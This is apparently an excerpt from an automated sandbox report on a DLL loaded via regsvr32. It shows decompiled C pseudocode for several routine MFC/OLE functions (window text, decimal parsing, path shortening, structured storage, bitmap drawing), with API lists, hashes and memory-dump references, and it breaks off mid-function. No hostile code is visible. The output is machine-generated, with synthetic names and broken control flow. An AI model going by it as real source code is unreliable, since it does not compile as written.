			E100253FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t33;
				void* _t44;
				int _t45;
				intOrPtr _t53;
				void* _t60;
				struct HWND__* _t62;
				void* _t65;
				void* _t66;

				_t60 = __edx;
				_push(8);
				E1004764D(0x1008f872, __ebx, __edi, __esi);
				_t62 =  *(_t66 + 8);
				E1001F0AF(_t62,  *((intOrPtr*)(_t66 + 0xc)));
				E100176B3( *((intOrPtr*)(_t62 + 4)),  *((intOrPtr*)(_t66 + 0xc)), _t66 + 8);
				if(_t62->i == 0) {
					_t33 = GetThreadLocale();
					__imp__#232( *(_t66 + 0x10), _t33, 0, _t66 - 0x10);
					__eflags = _t33;
					if(__eflags >= 0) {
						E1000B053(0, _t66 - 0x14, _t62, __esi, __eflags);
						 *((intOrPtr*)(_t66 - 4)) = 1;
						__imp__#6( *((intOrPtr*)(_t66 - 0x10)),  *((intOrPtr*)(_t66 - 0x10)));
						E100219F5(_t66 - 0x14, _t60,  *(_t66 + 8),  *((intOrPtr*)(_t66 - 0x14)));
						_t53 =  *((intOrPtr*)(_t66 - 0x14));
						goto L6;
					}
				} else {
					_t64 = GetWindowTextLengthA( *(_t66 + 8));
					L1000140B(_t66 + 0xc, E100184C0());
					_t8 = _t64 + 1; // 0x1
					 *((intOrPtr*)(_t66 - 4)) = 0;
					GetWindowTextA( *(_t66 + 8), E100103E6(_t66 + 0xc, _t37), _t8);
					E1000FED3(_t66 + 0xc, 0xffffffff);
					_t44 = L100147D9(0, _t66 + 0xc, _t60, _t62, _t37);
					_t65 = _t44;
					_t45 = GetThreadLocale();
					__imp__#197(_t65, _t45, 0,  *(_t66 + 0x10));
					 *(_t66 + 0x10) = _t45;
					__imp__#6(_t65);
					_t69 =  *(_t66 + 0x10);
					if( *(_t66 + 0x10) < 0) {
						_push(0xffffffff);
						_push(0);
						_push(0xf111);
						E1001B561(0, _t60, _t62, _t65, _t69);
						L1001ECE0(_t62);
					}
					_t53 =  *((intOrPtr*)(_t66 + 0xc));
					L6:
					_t33 = L100013E3(_t53 + 0xfffffff0, _t60);
				}
				return E10047725(_t33);
			}

0x100253ff
0x100253ff
0x10025406
0x1002540b
0x10025413
0x10025422
0x1002542b
0x100254b7
0x100254c1
0x100254c7
0x100254c9
0x100254d1
0x100254d9
0x100254e0
0x100254ec
0x100254f1
0x00000000
0x100254f1
0x10025431
0x1002543a
0x10025445
0x1002544a
0x10025452
0x1002545e
0x10025469
0x10025471
0x10025479
0x1002547c
0x10025484
0x1002548b
0x1002548e
0x10025494
0x10025497
0x10025499
0x1002549b
0x1002549c
0x100254a1
0x100254a8
0x100254a8
0x100254ad
0x100254f4
0x100254f7
0x100254f7
0x10025501

APIs

__EH_prolog3.LIBCMT ref: 10025406

Part of subcall function 100176B3: GetDlgItem.USER32(?,?), ref: 100176C0

GetWindowTextLengthA.USER32 ref: 10025434
GetWindowTextA.USER32(?,00000000,00000000), ref: 1002545E

Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6

GetThreadLocale.KERNEL32(00000000,?,000000FF), ref: 1002547C
VarDecFromStr.OLEAUT32(00000000,00000000), ref: 10025484
SysFreeString.OLEAUT32(00000000), ref: 1002548E

Part of subcall function 1001B561: __EH_prolog3.LIBCMT ref: 1001B568

Part of subcall function 1001ECE0: SetFocus.USER32 ref: 1001ED09
Part of subcall function 1001ECE0: SendMessageA.USER32 ref: 1001ED21

GetThreadLocale.KERNEL32(00000000,?,?,?,?,00000008), ref: 100254B7
VarBstrFromDec.OLEAUT32(?,00000000), ref: 100254C1
SysFreeString.OLEAUT32(?), ref: 100254E0

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeFromH_prolog3LocaleStringTextThreadWindow$BstrFocusItemLengthMessageSend_strlen
String ID:
API String ID: 2376774703-0
Opcode ID: 86baee08e6e8a0bae1c7f9a786f23086b386dd2aa20a3ea4805c4bcd496d968e
Instruction ID: 8efa296c8f4f5d99c1d74aff30f9075005738b09ad55c9108602e393422d39f0
Opcode Fuzzy Hash: 86baee08e6e8a0bae1c7f9a786f23086b386dd2aa20a3ea4805c4bcd496d968e
Instruction Fuzzy Hash: A831717950011AFFDF01EFA0CD858FE7B3AFF05355B508218F9269A1A2CB31AA51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 100264D2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E100264D2(void* __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t32;
				void* _t34;
				intOrPtr _t35;
				char* _t36;
				int _t38;
				CHAR* _t40;
				CHAR* _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				CHAR* _t54;
				void* _t56;
				int _t57;
				intOrPtr _t58;
				void* _t62;

				_t52 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(_t45);
				_push(_t56);
				_t54 = _a4;
				_push(0xffffffff);
				_t32 = E1002218F(_t54);
				_t67 = _t32;
				if(_t32 == 0) {
					E1000A069(_t45, __ecx, _t54, _t56, _t67);
				}
				_t57 = lstrlenA(_t54);
				_v8 = _t57;
				_t34 = E10034516(_t54, 0, 0);
				_t51 = _v8;
				_t47 = _t34 - 1;
				_t58 = _t57 - _t47;
				_t35 = _t58 + _t54;
				_v12 = _t35;
				if(_a8 < _t51) {
					if(_a8 >= _t47) {
						__eflags =  *_t54 - 0x5c;
						_t36 =  &(_t54[2]);
						_a4 = _t36;
						if( *_t54 == 0x5c) {
							__eflags = _t54[1] - 0x5c;
							if(_t54[1] == 0x5c) {
								while(1) {
									__eflags =  *_t36 - 0x5c;
									if( *_t36 == 0x5c) {
										goto L13;
									}
									_t36 = L1004CFCE(_t52, _t54, _a4);
									_pop(_t51);
									_a4 = _t36;
								}
							}
						}
						L13:
						__eflags = _t58 - 3;
						if(_t58 > 3) {
							do {
								_t43 = L1004CFCE(_t52, _t54, _a4);
								__eflags =  *_t43 - 0x5c;
								_a4 = _t43;
								_pop(_t51);
							} while ( *_t43 != 0x5c);
						}
						_t58 = _a4 - _t54;
						__eflags = _a8 - _t58 + _t47 + 5;
						if(_a8 >= _t58 + _t47 + 5) {
							_t49 = lstrlenA;
							while(1) {
								_t38 = lstrlenA(_a4);
								__eflags = _t38 + _t58 + 4 - _a8;
								if(_t38 + _t58 + 4 > _a8) {
									goto L18;
								} else {
									break;
								}
								do {
									L18:
									_t40 = L1004CFCE(_t52, _t54, _a4);
									__eflags =  *_t40 - 0x5c;
									_pop(_t51);
									_a4 = _t40;
								} while ( *_t40 != 0x5c);
							}
							__eflags = _t58;
							if(_t58 < 0) {
								L22:
								_t58 = _a8;
							} else {
								__eflags = _t58 - _a8;
								if(_t58 >= _a8) {
									goto L22;
								}
							}
							_t61 = _t58 + _t54;
							__eflags = _t58 + _t54;
							_push(E10047757(_t49, _t51, _t58 + _t54, 5, "\\...", 5));
							L1000135C(_t49, _t51, _t54, _t61);
							_t35 = E10026487(_t49, _t52, _t54, _t61, _t62, _t54, _v8, _a4);
						} else {
							_push(_v12);
							_push(_v8);
							goto L7;
						}
					} else {
						if(_a12 != 0) {
							_push(_t35);
							_push(_t51);
							L7:
							_push(_t54);
							_t35 = E10019530(_t47, _t52, _t54, _t58, _t62);
						} else {
							 *_t54 = 0;
						}
					}
				}
				return _t35;
			}

0x100264d2
0x100264d5
0x100264d6
0x100264d7
0x100264d8
0x100264da
0x100264dd
0x100264e0
0x100264e5
0x100264e7
0x100264e9
0x100264e9
0x100264f9
0x100264fc
0x100264ff
0x10026504
0x10026509
0x1002650a
0x1002650f
0x10026512
0x10026515
0x1002651e
0x1002653e
0x10026541
0x10026544
0x10026547
0x10026549
0x1002654d
0x1002655d
0x1002655d
0x10026560
0x00000000
0x00000000
0x10026554
0x10026559
0x1002655a
0x1002655a
0x1002655d
0x1002654d
0x10026562
0x10026562
0x10026565
0x10026567
0x1002656a
0x1002656f
0x10026572
0x10026575
0x10026575
0x10026567
0x1002657b
0x10026581
0x10026584
0x1002658e
0x100265a7
0x100265aa
0x100265b0
0x100265b3
0x00000000
0x00000000
0x00000000
0x00000000
0x10026596
0x10026596
0x10026599
0x1002659e
0x100265a1
0x100265a2
0x100265a2
0x10026596
0x100265b5
0x100265b7
0x100265be
0x100265be
0x100265b9
0x100265b9
0x100265bc
0x00000000
0x00000000
0x100265bc
0x100265ca
0x100265ca
0x100265d2
0x100265d3
0x100265df
0x10026586
0x10026586
0x10026589
0x00000000
0x10026589
0x10026520
0x10026524
0x1002652e
0x1002652f
0x10026530
0x10026530
0x10026531
0x10026526
0x10026526
0x10026526
0x10026524
0x1002651e
0x100265eb

APIs

lstrlenA.KERNEL32(?,?,000000FF), ref: 100264EF

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

Part of subcall function 10019530: _strcpy_s.LIBCMT ref: 1001953C

Strings

\..., xrefs: 100265C3

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8H_prolog3Throw_strcpy_slstrlen
String ID: \...
API String ID: 2411880420-1167917071
Opcode ID: 425b97c66bdc159ad821b8e1400f97d195f5a1d0c922c3df5298d3a716972ff9
Instruction ID: 4e355dd1eabe12f8d297b596017aaa3e0ceaf742dabed09d1a5a97fc94068f4e
Opcode Fuzzy Hash: 425b97c66bdc159ad821b8e1400f97d195f5a1d0c922c3df5298d3a716972ff9
Instruction Fuzzy Hash: 1E310776800A59FFEF11CF50EC80E9E7BA4EF09390F518126F9045A155E734EE90CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1002E2C0 Relevance: 12.3, APIs: 8, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E1002E2C0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t184;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E1004764D(0x10090312, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E1002C64F(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x100a5d5c, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L47:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L53:
										return E10047725(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										_t184 =  *_t127;
										 *((intOrPtr*)(_t184 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L47;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x100a604c, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							}
							__eflags = _t222;
							if(__eflags != 0) {
								L10022E9A(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
								 *(_t224 - 4) = 0;
								E10021EF1(_t224 - 0x2c, _t224 - 0x74);
								_t158 =  *(_t224 + 8);
								_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
								_t47 = _t224 - 4;
								 *_t47 =  *(_t224 - 4) | 0xffffffff;
								__eflags =  *_t47;
								 *(_t224 - 0x10) = _t159;
								L10022DDA(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
							} else {
								_t161 =  *(_t224 + 8);
								 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
							}
							_t129 =  *(_t224 + 8);
							goto L38;
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x100a605c);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E1002C456(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x100a48ac, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L53;
				}
				goto L2;
			}

0x1002e2c0
0x1002e2c7
0x1002e2cc
0x1002e2ce
0x1002e2d3
0x1002e2d8
0x1002e2db
0x1002e2fc
0x1002e302
0x1002e305
0x1002e308
0x1002e30b
0x1002e314
0x1002e31c
0x1002e31f
0x1002e352
0x1002e352
0x1002e357
0x1002e3bc
0x1002e3bf
0x1002e42b
0x1002e42b
0x1002e42f
0x1002e439
0x1002e43b
0x1002e43d
0x1002e58c
0x1002e58f
0x1002e5a9
0x1002e5a9
0x1002e5ae
0x1002e5b3
0x1002e5b3
0x1002e5b9
0x1002e5c0
0x1002e5c0
0x1002e5c7
0x1002e5ca
0x1002e5cf
0x1002e5cf
0x1002e591
0x1002e591
0x1002e595
0x1002e59c
0x1002e59f
0x1002e5a1
0x1002e5a4
0x1002e5a7
0x1002e5a7
0x00000000
0x1002e595
0x1002e443
0x1002e445
0x1002e49f
0x1002e4a2
0x1002e554
0x1002e55b
0x1002e55b
0x1002e55e
0x1002e561
0x1002e564
0x1002e567
0x00000000
0x00000000
0x1002e56c
0x1002e56e
0x1002e578
0x1002e57a
0x1002e589
0x1002e589
0x1002e578
0x00000000
0x1002e56c
0x1002e4ac
0x1002e4af
0x1002e4b1
0x1002e4b4
0x1002e4ed
0x1002e4ed
0x1002e4f4
0x1002e4f7
0x1002e4f7
0x1002e4fa
0x1002e4fd
0x00000000
0x00000000
0x1002e4ff
0x1002e508
0x1002e50e
0x1002e510
0x1002e513
0x00000000
0x00000000
0x1002e515
0x1002e521
0x1002e524
0x1002e52a
0x1002e52c
0x1002e52f
0x1002e531
0x1002e53d
0x1002e540
0x1002e546
0x1002e546
0x1002e549
0x1002e54c
0x1002e54f
0x00000000
0x1002e54f
0x1002e4b6
0x1002e4bd
0x1002e4bf
0x1002e4c5
0x1002e4c7
0x1002e4ca
0x00000000
0x00000000
0x1002e4cd
0x1002e4d3
0x1002e4d5
0x00000000
0x00000000
0x1002e4df
0x1002e4e5
0x00000000
0x1002e4e5
0x1002e4b8
0x1002e4bb
0x00000000
0x00000000
0x00000000
0x1002e4bb
0x1002e447
0x1002e44e
0x1002e451
0x1002e457
0x1002e459
0x1002e45c
0x00000000
0x00000000
0x1002e462
0x1002e46f
0x1002e472
0x1002e478
0x1002e47a
0x1002e47d
0x1002e47f
0x1002e48b
0x1002e48e
0x1002e494
0x1002e494
0x1002e497
0x00000000
0x1002e497
0x1002e3c1
0x1002e3c1
0x1002e3c5
0x1002e3cf
0x1002e3d1
0x1002e3d3
0x00000000
0x00000000
0x1002e3d5
0x1002e3d7
0x1002e3f3
0x1002e3ff
0x1002e402
0x1002e407
0x1002e411
0x1002e414
0x1002e414
0x1002e414
0x1002e41b
0x1002e41e
0x1002e3d9
0x1002e3d9
0x1002e3e2
0x1002e3e2
0x1002e423
0x00000000
0x1002e423
0x1002e35c
0x00000000
0x00000000
0x1002e362
0x1002e369
0x1002e36a
0x1002e36f
0x1002e374
0x00000000
0x00000000
0x1002e378
0x1002e379
0x1002e37a
0x1002e37b
0x1002e384
0x00000000
0x1002e386
0x1002e395
0x1002e398
0x1002e39b
0x1002e3a8
0x1002e3ab
0x1002e3b1
0x1002e3b4
0x00000000
0x1002e3b4
0x1002e384
0x1002e321
0x1002e32c
0x1002e336
0x00000000
0x00000000
0x1002e338
0x1002e344
0x1002e349
0x1002e34c
0x00000000
0x00000000
0x00000000
0x1002e34c
0x1002e2ec
0x1002e2f3
0x1002e2f6
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 1002E2C7

Part of subcall function 1002C456: SysStringLen.OLEAUT32(?), ref: 1002C45E
Part of subcall function 1002C456: CoGetClassObject.OLE32(?,?,00000000,100A592C,?), ref: 1002C47C

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1002E451
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1002E472
GlobalAlloc.KERNEL32(00000000,00000000), ref: 1002E4BF
GlobalLock.KERNEL32 ref: 1002E4CD
GlobalUnlock.KERNEL32(?), ref: 1002E4E5
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 1002E508
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1002E524

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: 8c7d488902b9e1a39518e68f9d93eed89a4edd8462c3009efc4f67080f8eaa64
Instruction ID: 46ea3d0135d633fa669698b565d5f04e2964583978d89af6c37444e9be5ad38e
Opcode Fuzzy Hash: 8c7d488902b9e1a39518e68f9d93eed89a4edd8462c3009efc4f67080f8eaa64
Instruction Fuzzy Hash: AAC128B094025ADFCB10DFA4D8889AEBBB9FF48344B904969F916EB251D771DD40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000DDD6 Relevance: 12.2, APIs: 8, Instructions: 202
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000DDD6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t122;
				intOrPtr _t130;
				intOrPtr _t132;
				struct tagRECT _t175;
				intOrPtr _t179;
				intOrPtr* _t181;
				void* _t183;

				_push(0x5c);
				E1004764D(0x1008e18e, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t183 - 0x30)) = 0x1009a2fc;
				 *(_t183 - 0x2c) = 0;
				 *((intOrPtr*)(_t183 - 0x28)) = 0;
				 *((intOrPtr*)(_t183 - 0x24)) = 0;
				 *(_t183 - 4) = 0;
				 *((intOrPtr*)(_t183 - 0x40)) = 0x1009a2fc;
				 *(_t183 - 0x3c) = 0;
				 *((intOrPtr*)(_t183 - 0x38)) = 0;
				 *((intOrPtr*)(_t183 - 0x34)) = 0;
				 *((intOrPtr*)(_t183 - 0x14)) = 0;
				 *((intOrPtr*)(_t183 - 0x18)) = 0x10098d24;
				 *(_t183 - 0x1c) = 0;
				 *((intOrPtr*)(_t183 - 0x20)) = 0x1009831c;
				_t181 =  *((intOrPtr*)(_t183 + 8));
				 *(_t183 - 4) = 3;
				if(E1000D064(_t183 - 0x30, _t181) != 0 && E1000D064(_t183 - 0x40, _t181) != 0 && GetObjectA( *( *((intOrPtr*)(_t183 + 0x14)) + 4), 0x18, _t183 - 0x68) != 0) {
					L1000CFA3(_t183 - 0x18, CreateBitmap, _t183, CreateBitmap(8, 8, 1, 1, 0x1009a514));
					E1000D03E(_t183 - 0x20, _t183 - 0x18);
					L1000CFF6(_t183 - 0x18);
					L1000CFA3(_t183 - 0x18, CreateBitmap, _t183, CreateBitmap( *(_t183 - 0x64),  *(_t183 - 0x60), 1, 1, 0));
					 *((intOrPtr*)(_t183 + 0x14)) = E1000D0A1( *(_t183 - 0x2c),  *( *((intOrPtr*)(_t183 + 0x14)) + 4));
					_t122 = E1000D0A1( *(_t183 - 0x3c),  *((intOrPtr*)(_t183 - 0x14)));
					 *((intOrPtr*)(_t183 - 0x10)) = _t122;
					if( *((intOrPtr*)(_t183 + 0x14)) != 0 && _t122 != 0) {
						 *((intOrPtr*)(_t183 + 8)) = E1000BD03(GetPixel( *(_t183 - 0x2c), 0, 0), _t183 - 0x30, _t123);
						E1000BD03(BitBlt( *(_t183 - 0x3c), 0, 0,  *(_t183 - 0x64),  *(_t183 - 0x60),  *(_t183 - 0x2c), 0, 0, 0xcc0020), _t183 - 0x30, 0xffffff);
						E1000BD03(BitBlt( *(_t183 - 0x3c), 0, 0,  *(_t183 - 0x64),  *(_t183 - 0x60),  *(_t183 - 0x2c), 0, 0, 0xee0086), _t183 - 0x30,  *((intOrPtr*)(_t183 + 8)));
